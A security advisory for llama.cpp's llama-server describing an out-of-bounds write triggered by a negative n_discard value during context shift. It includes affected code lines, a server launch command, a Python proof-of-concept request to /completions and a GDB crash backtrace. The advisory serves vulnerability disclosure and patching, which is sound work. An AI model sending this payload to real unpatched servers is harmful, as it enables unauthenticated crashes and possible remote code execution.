Skip to content

Out-of-bounds Write in llama.cpp llama-server

High
ggerganov published GHSA-8947-pfff-2f3c Jan 5, 2026

Package

llama.cpp (ggml-org/llama.cpp)

Affected versions

<= 55d4206c8

Patched versions

None

Description

Summary

Context shift trusts the client’s n_discard blindly. A remote attacker can supply a negative value through the public completions
endpoints, corrupt the KV cache/text buffers during shifting, and crash the process or pivot to RCE. Severity: Critical.

Details

  • Entry points: /completions, /chat/completions, /slots/(resume)—anything that goes through server_task::params_from_json_cmpl().
  • tools/server/server.cpp:326: n_discard is parsed straight from JSON into slot_params::n_discard with no non‑negative check.
  • When the context is full, server_context::update_slots() consumes slot.task->params.n_discard to shift tokens (tools/server/
    server.cpp:3613 ff.).
  • A negative value causes:
    • llama_memory_seq_rm/add to receive a reversed range and negative offset, desynchronizing the KV cache.
    • The loop at tools/server/server.cpp:3626-3630 to evaluate new_tokens[i - n_discard] as new_tokens[i + |n_discard|], writing
      beyond the end of the std::vector.
  • With ASan or the built-in guards you see aborts (pos_min == -1), but removing them yields deterministic out-of-bounds writes—
    exactly what an attacker needs for code execution.

PoC

Prerequisite: start the server with context shift enabled (--context-shift). Works for both CPU and GPU builds; below uses a
CUDA+ASan binary.

  1. Build llama-server with CUDA and ASan (per the standard instructions).
  2. Launch it:

CUDA_LAUNCH_BLOCKING=1
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0
LSAN_OPTIONS=detect_leaks=0
LD_LIBRARY_PATH=/usr/local/cuda/lib64:$LD_LIBRARY_PATH
build-cuda-asan/bin/llama-server
--model /models/DeepSeek-R1-Distill-Qwen-32B-Q2_K.gguf
--ctx-size 128
--port 8080
--context-shift

  1. Issue a malicious request (no auth needed):
#!/usr/bin/env python3
import requests

resp = requests.post(
    "http://127.0.0.1:8080/completions",
    json={
        "prompt": "seed text",
        "stream": False,
        "cache_prompt": True,
        "n_predict": 512,
        "n_keep": 0,
        "n_discard": -32,
        "temperature": 0.0,
    },
    timeout=60,
)
print(resp.status_code, resp.text[:200])
  1. Server logs show slot context shift ... n_discard = -32, followed by KV inconsistency or ASan OOB reports. In non-sanitized
    builds the same path yields silent memory corruption and opens the door to RCE.

Impact

  • Remote unauthenticated out-of-bounds write leading to crash or arbitrary code execution.
  • Every llama.cpp deployment running the HTTP server with --context-shift (CPU or GPU) is affected.
  • Attacker needs only network access; no credentials or user interaction.

Output

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) [answered N; input not from terminal]
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
warning: could not find '.gnu_debugaltlink' file for /lib/x86_64-linux-gnu/liblber.so.2
warning: could not find '.gnu_debugaltlink' file for /lib/x86_64-linux-gnu/libbrotlidec.so.1
warning: could not find '.gnu_debugaltlink' file for /lib/x86_64-linux-gnu/libbrotlicommon.so.1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007f0c1219d813 in wait4 () from /lib/x86_64-linux-gnu/libc.so.6
#0  0x00007f0c1219d813 in wait4 () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x0000556d78816cd6 in __interceptor_waitpid ()
#2  0x00007f0c12670177 in ggml_print_backtrace () at /workspace/ggml/src/ggml.c:196
196             waitpid(child_pid, NULL, 0);
#3  0x00007f0c1267067a in ggml_abort (file=<optimized out>, line=<optimized out>, fmt=<optimized out>) at /workspace/ggml/src/ggml.c:230
230             ggml_print_backtrace();
#4  0x0000556d78a71d73 in server_context::update_slots (this=0x7f0c0fa01900) at /workspace/tools/server/server.cpp:3835
3835                                        GGML_ABORT("pos_min == -1, but n_past > 0 - should not happen: https://github.com/ggml-org/llama.cpp/pull/13833#discussion_r2116181237");
#5  0x0000556d7891c8ca in std::function<void ()>::operator()() const (this=0x7f0c0fa03078) at /usr/bin/../lib/gcc/x86_64-linux-gnu/13/../../../../include/c++/13/bits/std_function.h:591
591             return _M_invoker(_M_functor, std::forward<_ArgTypes>(__args)...);
#6  server_queue::start_loop (this=0x7f0c0fa02f58) at /workspace/tools/server/server.cpp:2152
2152                callback_update_slots();
#7  0x0000556d788c97c4 in main (argc=<optimized out>, argv=<optimized out>) at /workspace/tools/server/server.cpp:5753
5753        ctx_server.queue_tasks.start_loop();
[Inferior 1 (process 32778) detached]
[1]    32778 IOT instruction (core dumped)  ASAN_OPTIONS=abort_on_error=1:detect_leaks=0 LSAN_OPTIONS=detect_leaks=0  

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2026-21869

Weaknesses

Out-of-bounds Write

The product writes data past the end, or before the beginning, of the intended buffer. Learn more on MITRE.

Credits